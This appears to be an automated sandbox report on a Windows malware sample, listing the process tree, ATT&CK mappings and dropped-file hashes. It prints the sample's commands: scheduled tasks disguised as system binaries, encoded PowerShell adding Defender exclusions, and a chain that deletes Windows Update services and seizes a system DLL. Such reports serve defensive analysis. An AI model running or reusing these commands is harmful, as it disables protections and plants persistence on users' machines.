C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Defender\es-ES\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\odt\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 7 /tr "'C:\odt\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\odt\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 13 /tr "'C:\odt\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Public\Desktop\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Desktop\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2272

C:\Program Files\Google\Chrome\updaterchr.exe
"C:\Program Files\Google\Chrome\updaterchr.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:4188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBuAGgAcQBrACMAPgAgAEAAKAAgADwAIwBtAHcAdAAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaQBqAGEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAbABkAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgBlAGcAIwA+AA=="
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:220

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
PID:2904

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1368

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1128

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3140

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4860

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4124

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:32

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:3840

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies registry key
PID:1504

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:4948

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:2004

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2348

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3172

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1460

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:3100

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2032

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:3748

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:1164

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:256

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:268

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:300

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:4396

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:4960

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:4120

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:1812

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:4532

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:2444

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:3152

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:2340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAZQBrACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAGMAaAByAC4AZQB4AGUAIgAnACkAIAA8ACMAawBmAHEAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBpAGYAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBiAHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBHAE4AQwAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGsAdgBrAHUAIwA+ADsA"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2160

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "bosjczbpam"
2⤵
PID:4232

C:\Windows\explorer.exe
C:\Windows\explorer.exe lhjhhfereinutqkk0 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUJUDxpO3xQsm1i/s1JWMxbg4CDDUjUzNRskPjZWvNKNodOgKV2HJ8tTN0QVJgDyg+2bViTlti9ZxC5n49dcOUKQgK8rh3k8SmDF6+u9ZQ5hRhwXNv/1S1TKEHJpFva5VT15ywFxRzv+p6QJjNw/L6ZZoe3/92cs2DQxDkoE3IsIzkx9TTRmCLGdVqAhSSaqD/gWCF8syjnqONW8nAkIDCaiX6JyJkuCgTuOQv8CpGeKv1VALuliP/ha8Yjhtr6HMGk2rtUy+qneh6aJBuRE2Vl54snxeUp5YsY49VDdIyEysvbl9BsEUC35mC2kOBCmxC0JxCaQIXPdfkaqqK0slLenN1msO3trj6XDK8r1gefSJa5eSdUWn80xUbCsMx+vSBw/fgeBKOpIbO3PFsHY47GpDwiBS4J/sfvFzm9Z81e/R0fe5W8jG0UPs4d7gICDhbEElYG2jSwHbK0S6OPBDvA3oFTND9PNmzn3LH3zqfX+FjpyLAxPdNktvAJH72zq+MPDCIF7jYmQ5wBcD3ROPUkA==
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3232

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4120

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4060

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Windows Defender\es-ES\SppExtComObj.exe
Filesize
2.7MB

MD5
3f986a5db4be11696bf589aa929c4e37

SHA1
29a1f54cb4767f94c038f0ec6d6528e718cffee4

SHA256
fd4b327492c79f498ff8f36d0019c17e7a48ea6ad12a3aadd342f9ddbb809bae

SHA512
39287d55b9029bc22bf24bd1417f22722190b9d9f01903f51549ca6e19c27f9903b90ad1c9680beb6d3b1c1f3c82e5576b389d5c3fe8b344920004c2826811ae

Download Submit
C:\Program Files (x86)\Windows Defender\es-ES\SppExtComObj.exe
Filesize
2.7MB

MD5
3f986a5db4be11696bf589aa929c4e37

SHA1
29a1f54cb4767f94c038f0ec6d6528e718cffee4

SHA256
fd4b327492c79f498ff8f36d0019c17e7a48ea6ad12a3aadd342f9ddbb809bae

SHA512
39287d55b9029bc22bf24bd1417f22722190b9d9f01903f51549ca6e19c27f9903b90ad1c9680beb6d3b1c1f3c82e5576b389d5c3fe8b344920004c2826811ae

Download Submit
C:\Program Files\Google\Chrome\updaterchr.exe
Filesize
4.3MB

MD5
de0c1cad99b50eb867f1bfb11198f735

SHA1
b6de7ae80c7ec968856f1a2e51c13bd10d6564cb

SHA256
33f6aec65985b835bbf89462fd2d15b513bd7b7ba2c9295a36ab34f6faf7b727

SHA512
b2cc3c62689461016e0e1a0b16b87f51f8f3d4a5eec4a2d5da60315a94a43ee9851c904805ebb9b851c670181585d27051b1935c26ad0c4a90947c3b7acc0b95

Download Submit
C:\Program Files\Google\Chrome\updaterchr.exe
Filesize
4.3MB

MD5
de0c1cad99b50eb867f1bfb11198f735

SHA1
b6de7ae80c7ec968856f1a2e51c13bd10d6564cb

SHA256
33f6aec65985b835bbf89462fd2d15b513bd7b7ba2c9295a36ab34f6faf7b727

SHA512
b2cc3c62689461016e0e1a0b16b87f51f8f3d4a5eec4a2d5da60315a94a43ee9851c904805ebb9b851c670181585d27051b1935c26ad0c4a90947c3b7acc0b95

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
614f88cf39eb3223246afec4bf1463b4

SHA1
74d738ee6fdada75ac1ef1645073005e3f6b6cfb

SHA256
021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd

SHA512
84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
55263022bc9d9761db86e6dd7cd852a7

SHA1
4e071c0f4059c5c763a0832f714e4dafcfc2a574

SHA256
6df1b5a88fca88a99c24ed36bc5e860ce95cb6efaf57775fc3b3fbf8360aa52c

SHA512
f4200dbd37e3f2b0d20fa9923ac54f3eed7435dd74c930f9887f388a749c0f7fc3fcf4ddbb62b343e5ce3832d991899f5d9cd98323aa823187f30baa91d9fa63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
cdaaa00db55f0b74f9d9d01c90efff89

SHA1
1f8f748230d3c67854d0783f5b9223369ff8f89c

SHA256
7ed2b096ea07f71e97831944c45f8f78abda2e30e74162c241bc0e50d7dc15a1

SHA512
db039b3a33874c26ba6920cb56da2cd4511df0198a957fa7b066a03dc8a4dc8f3039a043bae2681905f055b4dfb76b96f8a08e76aa830e1909d220dc55271307

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
cdaaa00db55f0b74f9d9d01c90efff89

SHA1
1f8f748230d3c67854d0783f5b9223369ff8f89c

SHA256
7ed2b096ea07f71e97831944c45f8f78abda2e30e74162c241bc0e50d7dc15a1

SHA512
db039b3a33874c26ba6920cb56da2cd4511df0198a957fa7b066a03dc8a4dc8f3039a043bae2681905f055b4dfb76b96f8a08e76aa830e1909d220dc55271307

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
7333af3d20d33e97cb98432af70843e2

SHA1
7e8825a88f118806465d26c04196f4b1e660ea32

SHA256
5a17512f35c9dc258c316ba5d719c1cd0b3542653f7c8437233705fd5c643cdb

SHA512
088b162606b0438e191dd5c52aea37370007aa1076fe665d1f325e5b9e7dbc4f669f9f6c81eeca8da732d867391f860517e77f59cd4e82c48cee5f6646969800

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3d3fadbe70f50bd06ff473ea60760e7c

SHA1
ed34cae4bad2b5d437bf39cb50baed103d7c0724

SHA256
833eef5861842427a325026045b660852fcc1fef2756133236286a9f93e1bce4

SHA512
afe3ab35f57dbce85e870c5139ce75ca859a0a94438bc9add0e87902b2180bbbc620584550e356a2abe46c2c42840d98473c9fa21db682af78712baa61211998

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
17fbfbe3f04595e251287a6bfcdc35de

SHA1
b576aabfd5e6d5799d487011506ed1ae70688987

SHA256
2e61ae727ca01496c9418a65777d6d7e05a85cbdb6b3a19516857442e5bd2da0

SHA512
449c68512d90a17f598e9dacfd6230e6e97bc6bfaaf2b06f3b91b370ece92e2322b81ee3721e288880fa1f05470156e519256e3f03d786c3b28a39788f5e0ad6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
e8ce785f8ccc6d202d56fefc59764945

SHA1
ca032c62ddc5e0f26d84eff9895eb87f14e15960

SHA256
d85c19fc6b9d25e2168a2cc50ff38bd226fbf4f02aa7ac038a5f319522d2ffa4

SHA512
66460aec4afee582556270f8ee6048d130a090f1c12a2632ed71a99a4073e9931e9e1cc286e32debffb95a90bd955f0f0d6ec891b1c5cd2f0aae41eb6d25832f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
60804e808a88131a5452fed692914a8e

SHA1
fdb74669923b31d573787fe024dbd701fa21bb5b

SHA256
064fdd6e9e6e7f51da354604a56f66217f1edfc12d9bbbaf869a628915a86a61

SHA512
d4f2791433c0bacd8cad57b40fab4a807db4dd74f7c5357d2bce9aaa6544f97667497307d1e0704b98e2c99a94775fbb6ea676685a01578e4d0304f541c9854a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
60804e808a88131a5452fed692914a8e

SHA1
fdb74669923b31d573787fe024dbd701fa21bb5b

SHA256
064fdd6e9e6e7f51da354604a56f66217f1edfc12d9bbbaf869a628915a86a61

SHA512
d4f2791433c0bacd8cad57b40fab4a807db4dd74f7c5357d2bce9aaa6544f97667497307d1e0704b98e2c99a94775fbb6ea676685a01578e4d0304f541c9854a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
60804e808a88131a5452fed692914a8e

SHA1
fdb74669923b31d573787fe024dbd701fa21bb5b

SHA256
064fdd6e9e6e7f51da354604a56f66217f1edfc12d9bbbaf869a628915a86a61

SHA512
d4f2791433c0bacd8cad57b40fab4a807db4dd74f7c5357d2bce9aaa6544f97667497307d1e0704b98e2c99a94775fbb6ea676685a01578e4d0304f541c9854a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
e8ce785f8ccc6d202d56fefc59764945

SHA1
ca032c62ddc5e0f26d84eff9895eb87f14e15960

SHA256
d85c19fc6b9d25e2168a2cc50ff38bd226fbf4f02aa7ac038a5f319522d2ffa4

SHA512
66460aec4afee582556270f8ee6048d130a090f1c12a2632ed71a99a4073e9931e9e1cc286e32debffb95a90bd955f0f0d6ec891b1c5cd2f0aae41eb6d25832f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
22fbec4acba323d04079a263526cef3c

SHA1
eb8dd0042c6a3f20087a7d2391eaf48121f98740

SHA256
020e5d769893724f075e10b01c59bf2424214cefe6aafbab6f44bc700f525c40

SHA512
fb61d737de8cbed6b7d8b5a35911c46ef26a2927a52ed7add9d594cf19dcab1b9978b61912c6f3fe4f29228f4454fb022fb2e167788c727dc6503c1fcd42159e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
22fbec4acba323d04079a263526cef3c

SHA1
eb8dd0042c6a3f20087a7d2391eaf48121f98740

SHA256
020e5d769893724f075e10b01c59bf2424214cefe6aafbab6f44bc700f525c40

SHA512
fb61d737de8cbed6b7d8b5a35911c46ef26a2927a52ed7add9d594cf19dcab1b9978b61912c6f3fe4f29228f4454fb022fb2e167788c727dc6503c1fcd42159e

Download Submit
C:\Users\Admin\AppData\Local\Temp\AntiDebug.exe
Filesize
4.3MB

MD5
de0c1cad99b50eb867f1bfb11198f735

SHA1
b6de7ae80c7ec968856f1a2e51c13bd10d6564cb

SHA256
33f6aec65985b835bbf89462fd2d15b513bd7b7ba2c9295a36ab34f6faf7b727

SHA512
b2cc3c62689461016e0e1a0b16b87f51f8f3d4a5eec4a2d5da60315a94a43ee9851c904805ebb9b851c670181585d27051b1935c26ad0c4a90947c3b7acc0b95

Download Submit
C:\Users\Admin\AppData\Local\Temp\AntiDebug.exe
Filesize
4.3MB

MD5
de0c1cad99b50eb867f1bfb11198f735

SHA1
b6de7ae80c7ec968856f1a2e51c13bd10d6564cb

SHA256
33f6aec65985b835bbf89462fd2d15b513bd7b7ba2c9295a36ab34f6faf7b727

SHA512
b2cc3c62689461016e0e1a0b16b87f51f8f3d4a5eec4a2d5da60315a94a43ee9851c904805ebb9b851c670181585d27051b1935c26ad0c4a90947c3b7acc0b95

Download Submit
C:\Users\Admin\AppData\Local\Temp\Protector.exe
Filesize
3.0MB

MD5
c694007ac061e76162b9b0c12d785e11

SHA1
7b29c56bdbfa3d27691ac82f973791c55cc68c49

SHA256
810eb018db746edecd676a6dc48be59007f55338895b1a898721dfc769e1e992

SHA512
4fa8ec3a39e4257943f432ce1b2a44da157e1fcdcd0819ba0267672b24c0831b03b0c59ae0c95c60801547c2fec7d83c58d6bf2070907166725be3ae3edb382a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Protector.exe
Filesize
3.0MB

MD5
c694007ac061e76162b9b0c12d785e11

SHA1
7b29c56bdbfa3d27691ac82f973791c55cc68c49

SHA256
810eb018db746edecd676a6dc48be59007f55338895b1a898721dfc769e1e992

SHA512
4fa8ec3a39e4257943f432ce1b2a44da157e1fcdcd0819ba0267672b24c0831b03b0c59ae0c95c60801547c2fec7d83c58d6bf2070907166725be3ae3edb382a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Senox.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Senox.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\acaaba7e-50c8-4265-9e5b-227a89b37319.vbs
Filesize
514B

MD5
14f68d634571424e94a960cdd1694206

SHA1
baf40c34afb136e61f5f6ff8be5f15302ed1e833

SHA256
b86c068ea3611d9758b1ed61fe93e389fbffe0fa99ada7b4489f24462647c093

SHA512
862f86e50f510cefa55ac34033699bafa37be9972b6a6f5745683a6177127e9c7bbb00b08d9bcf0667ad14911f41275c9c4ea03511c18591f5abd51cffdacc56

Download Submit
C:\Users\Admin\AppData\Local\Temp\d5a27e89-2bdb-493f-903c-9534c678f33e.vbs
Filesize
738B

MD5
e90d61813ba83a896f6d346a1d00c7d0

SHA1
90f6adbd2eaa3bc7ea9e39009c122c8862051910

SHA256
f2a7067495a7b1b0a8b1f1dd63a101b4de68ec64eabce366a313d061f2e0b6b4

SHA512
